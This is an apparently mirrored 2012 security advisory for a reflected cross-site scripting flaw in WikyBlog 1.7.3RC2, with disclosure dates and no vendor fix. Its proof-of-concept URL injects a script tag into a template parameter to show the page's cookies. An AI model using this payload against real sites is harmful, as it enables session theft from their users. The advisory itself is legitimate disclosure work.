WikyBlog 1.7.3RC2 XSS vulnerability

2012-03-19T00:00:00
ID SECURITYVULNS:DOC:27785
Type securityvulns
Reporter Securityvulns
Modified 2012-03-19T00:00:00

Description

Advisory: WikyBlog 1.7.3RC2 XSS vulnerability Advisory ID: SSCHADV2012-006 Author: Stefan Schurtz Affected Software: Successfully tested on WikyBlog 1.7.3RC2 Vendor URL: http://www.wikyblog.com/ Vendor Status: informed

========================== Vulnerability Description ==========================

WikyBlog 1.7.3RC2 is prone to a XSS vulnerability

================== PoC-Exploit ==================

http://[target]/WikyBlog-1.7.3rc2/index.php/Special/Main/Templates?cmd=copy&which='"<script>alert(document.cookie)</script>

========= Solution =========

-

==================== Disclosure Timeline ====================

25-Feb-2012 - vendor informed 15-Mar-2012 - no response from vendor

======== Credits ========

Vulnerability found and advisory written by Stefan Schurtz.

=========== References ===========

http://www.darksecurity.de/advisories/2012/SSCHADV2012-006.txt